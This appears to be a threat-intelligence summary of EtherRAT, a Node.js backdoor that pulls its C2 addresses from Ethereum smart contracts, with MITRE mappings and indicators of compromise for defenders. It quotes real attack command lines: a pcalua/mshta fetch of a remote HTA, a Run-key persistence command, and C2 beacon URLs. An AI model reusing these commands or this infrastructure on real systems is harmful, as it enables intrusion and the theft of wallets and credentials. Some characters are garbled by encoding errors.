eSentire TRU discovered EtherRAT, a Node.js backdoor that retrieves C2 addresses from Ethereum smart contracts (EtherHiding), performs extensive host fingerprinting, and uses CDN-like HTTPS beaconing to blend malicious traffic. The campaign involved initial access via ClickFix and IT Support scams (pcalua.exe -> mshta.exe), persistence via HKCU Run with conhost proxying node.exe, and widespread use of Obfuscator.io for code obfuscation. #EtherRAT #EtherHiding
Keypoints
- eSentire TRU detected EtherRAT in a Retail customer environment; EtherRAT is a Node.js backdoor enabling arbitrary command execution and asset theft (cryptocurrency wallets, cloud credentials).
- EtherRAT retrieves C2 addresses via EtherHiding by reading smart contract data on Ethereum and refreshes C2 addresses using setString events, increasing takedown resilience.
- Initial access observed included ClickFix (LOLBin pcalua.exe -> mshta.exe indirect execution) and social-engineering IT Support scams over Microsoft Teams with QuickAssist for remote access.
- Persistence is established via creating an HKCU Run registry value (random 12-character name) that uses conhost.exe âheadless to proxy-execute node.exe running the EtherRAT payload.
- Malware stages: stage 1 decrypts a stager (AES-256-CBC) and uses module._compile(); stage 2 (Obfuscator.io) decrypts and writes the EtherRAT payload to disk then executes it.
- Command-and-control uses Ethereum RPC providers to fetch the smart-contract-stored C2 and then polls C2 via HTTPS CDN-like URLs; EtherRAT can reobfuscate itself by POSTing source to C2.
MITRE Techniques
- [T1218 ] System Binary Proxy Execution â pcalua.exe is used to proxy-execute mshta.exe to retrieve a malicious HTA: âpcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.htaâ
- [T1547.001 ] Registry Run Keys and Startup Folder â persistence via HKCU Run key created with reg.exe to auto-start EtherRAT using conhost proxy: âreg add âHKCUSoftwareMicrosoftWindowsCurrentVersionRunâ /v â0c939bf7ae8fâ ⌠conhost.exe âheadless âC:UsersAppDataLocalVZM5DHxgYbxqnode.exeâ âC:UsersAppDataLocalVZM5DHTlHAiIlxoF.binââ
- [T1071 ] Application Layer Protocol â C2 beaconing over HTTPS using CDN-like URL patterns to blend traffic and retrieve commands: âhxxps://aurineuroth[.]com/api/5f459179/29e96c95-62a5-49e5-a8ba-7ebfbf560ab7/b435a6b1.ico?b=9e2f9c07-f85a-4089-8669-186f56bca7b3â
- [T1027 ] Obfuscated Files or Information â use of Obfuscator.io to obfuscate Node.js stages and EtherRAT: âgiven the appearance and functionality of this stage, we conclude it was obfuscated via Obfuscator.ioâ
- [T1204 ] User Execution â social engineering via ClickFix and IT Support scams (Microsoft Teams + QuickAssist) to get users to execute or allow remote access: âTRU observed the use of ClickFix; however, in most incidents TRU has observed, IT Support scams are conducted over Microsoft Teams, followed by the use of QuickAssist.â
- [T1005 ] Data from Local System â theft of local assets including cryptocurrency wallets and cloud credentials: âsteal assets such as cryptocurrency wallets and cloud credentials.â
- [T1105 ] Ingress Tool Transfer â downloading and extracting tooling (portable Node.js) via curl to stage the runtime: ââC:WindowsSystem32curl.exeâ -s -L -o âC:UsersAppDataLocalTempQE35OO5mUa.zipâ âhttps://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zipââ
- [T1059 ] Command and Scripting Interpreter â execution of malicious Node.js code in memory using module._compile() and child_process.spawn(), plus PowerShell and shell commands for fingerprinting: âmodule._compile()â and âchild_process.spawn()â
Indicators of Compromise
- [Domain ] EtherRAT C2 and compromised hosting â aurineuroth.com, jariosos.com, and 9 more C2 domains (hayesmed.com, regancontrols.com, salinasrent.com, justtalken.com, mebeliotmasiv.com, euclidrent.com, o-parana.com, palshona.com, etc.)
- [IP ] C2 IP address â 185.218.19.162 (associated with aurineuroth[.]com / ASN#400992 âZhouyiSat Communicationsâ)
- [File hash ] Malware and staging artifacts â 2edf1ab615b489e228a89c617d24f66d1e780a6d5e30f6886608dfe79325acf8 (shep.hta), 5623f4f8942872b2b7cb6d2674c126a42bdf6ed5d1f37c1afc348529e4697d73 (stage 1), and several other hashes (and 9 more hashes)
- [File name ] Stager and payload filenames â aeJ8aMT9ogQtKEb.dat (encrypted stager), 2htgIPQLUYA3aWq.cfg (encrypted EtherRAT blob), TLHA1IlxoF.bin (decrypted payload written to disk)
- [Command Line ] Notable execution strings â âC:Windowssystem32cmd.exe /min /c âpcalua.exe -a mshta.exe -c hxxps://www-flow-submission-management.shepherdsestates[.]uk/shep.htaââ and âreg add âHKCUSoftwareMicrosoftWindowsCurrentVersionRunâ /v â0c939bf7ae8fâ ⌠conhost.exe âheadless ⌠node.exe TLHAiIlxoF.binâ
- [URL ] Download staging URL â https://nodejs.org/dist/v18.17.0/node-v18.17.0-win-x64.zip (used to download portable Node.js runtime)
- [Ethereum Smart Contract ] Smart contract used for EtherHiding C2 â 0xe26c57b7fa8de030238b0a71b3d063397ac127d3 (events show setString updates with C2 addresses)
- [RPC Provider ] Blockchain RPC endpoints used to retrieve contract data â https://eth.llamarpc.com (one of multiple RPC providers queried concurrently)